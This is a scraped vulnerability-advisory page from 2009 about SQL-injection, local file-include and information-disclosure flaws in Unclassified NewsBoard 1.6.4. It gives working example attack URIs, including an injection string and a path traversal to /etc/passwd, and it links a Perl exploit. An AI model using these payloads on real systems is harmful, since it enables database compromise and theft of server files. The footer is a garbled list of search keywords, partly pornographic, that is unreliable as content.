about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Unclassified NewsBoard Multiple Remote Vulnerabilities


Title Unclassified NewsBoard Multiple Remote Vulnerabilities
Published 2009-06-02-12:00AM
Updated 2009-06-03-02:19PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  __GiReX__
Vulnerable  Unclassified NewsBoard Unclassified NewsBoard 1.6.4
Not Vulnerable  
Code  An attacker can exploit these issues through a browser.The following example URIs are available:For the SQL-injection issue:
http://www.example.com/forum.php?req=search&Query=xxx'))OR/**/1=1%23&ResultView=2&InMessage=1&Sort=2&Forum=0For the local file-include issue:
http://www.example.com/forum.php?GLOBALS[UTE][__tplCollection][a][file]=../../../../../../../../../../../../etc/passwd%00 For the information-disclosure issues:
http://www.example.com/forum.php?req=rss&type=3&forum=1&GLOBALS[filename]=../logs/board-yyyy-mm-dd.log
http://www.example.com/extra/import/import_wbb1.phpThe following exploit for the SQL-injection issue is available:
  • /data/vulnerabilities/exploits/35183.pl
  • TXT  t3xt 1t!


    Advertising

    Copyright 2007, SecurityDot
    Mon, 09 Nov 2009 14:38:31 +0000

    Friends : milw0rm.com , secunia.com , securityfocus.com
    GOOGLE
    NEWS EXPLOITS VULNS
    exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
    www.wm880. Joomla Com News Searc somali new t342t www.indian news for c Invision P desi mom s Crack Data sex move i sexygerls web wiz fo news for c msn chekre 250wyt.cn guestbook %20linux%2 simranphot crawler mambo Remo Vidio porn news for c a.qvod123. airmaxhome pinaysexsc www.139tao 18927 Vidio porn icecap trishanude Monique Fu medal let duta b podpress kaspersky www.hongne Archiv sex Crack+Data GAY SEX Russiannud WWW Free S sex tub www,taruna sexygerls www.sexfar mambo Remo WWW Free S seminole www.zql.yn